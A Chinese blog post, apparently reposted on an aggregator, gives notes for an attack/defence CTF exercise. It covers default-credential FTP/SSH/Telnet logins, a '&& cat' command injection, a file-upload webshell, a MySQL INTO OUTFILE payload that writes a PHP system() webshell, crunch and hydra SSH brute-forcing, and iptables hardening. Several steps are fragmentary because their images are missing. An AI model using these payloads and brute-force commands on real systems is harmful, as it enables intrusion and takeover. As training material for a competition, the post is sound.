网络空间安全——攻防对抗 2.0

Posted catw0rld

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络空间安全——攻防对抗 2.0相关的知识,希望对你有一定的参考价值。

  1. 信息收集,使用kali,扫描己方靶机端口

  1. 21端口的ftp的攻击

ftp攻击方式,查看本机有哪些普通用户

 

admin/123456和guest/123456

 

 

 

 

然后提交flag

 

  1. 22端口的ssh攻击

 

 

 

 

使用session –I 查看已经获取到的连接

 

使用session –I 序号 获取连接

 

 

  1. 23 telnet的攻击方式

 

 

 

  1. 防御21-23端口的攻击
  1. 改密码

 

  1. 或者删除500以上的用户

.

 

 

  1. 80http的攻击方法

进入自己的网站根目录

 

DisplayDirectory.php

 

此页面用来查看文件夹内的内容

 

 

使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分

 

加固

 

 

 

 

 

 

FileSharing.php  文件上传漏洞

 

Kali生成木马

 

 

找到存储木马的路径

 

 

木马路径

 

使用工具连接

 

加固

 

 

 

 

WebShell.php

 

 

加固

 

 

 

通过查看TestConn.php页面可获知数据库密码为root/root

 

  1. 3306数据库攻击方式,使用kali远程连接别人的数据库

 

攻击代码

select '<?php system($_GET[\\'a\\']); ?>' INTO OUTFILE '/var/www/html/a.php';

 

攻击

 

加固漏洞

        >use mysql;

>update user set Password=password('123456') where User='root';

 

修改密码即可

 

  1. 攻击10000以后的大端口后门

 

 

加固

写centos的iptables,关闭防火墙

 

清除防火墙预设规则

 

设置默认规则,拒绝所有进来的流量

 

设置默认规则,拒绝所有转发流量

 

设置默认规则,允许所有出去的流量

 

允许21,22,23,80,3306

 

保存防火墙规则

 

启动防火墙

 

查看结果

攻防对抗2

  1. 扫描

 

  1. 制作字典跑密码

crunch 6 6 -t 0000%%  > /passw

 

开始破解自己的密码

hydra -l root -P /passw -t 4 ssh://172.16.120.250

 

现在使用putty进去到自己的靶机

 

  1. 21-23端口攻击方法一致
  2. 80端口攻击

生成字典

 

调出网站后台破解工具

 

 

 

 

得出网站后台

  1. 3306与上文一致
  2. 大端口修改

攻击方法一致

加固方法需要谨慎

法1:shell脚本一次成型

 

 

 

 

法2:把防火墙规则写在防火墙配置文件里面

 

 

 

开发者涨薪指南 48位大咖的思考法则、工作方式、逻辑体系

以上是关于网络空间安全——攻防对抗 2.0的主要内容,如果未能解决你的问题,请参考以下文章

等保2.0+安全实验室+漏洞挖掘+攻防实战,你get了吗?

等保2.0+安全实验室+漏洞挖掘+攻防实战,你get了吗?

渗透测试和攻防演练的区别

网络攻防对抗技术 实验报告二

筑牢网络安全防线,优炫数据库实战出击再获佳绩

网络攻防平台都有哪些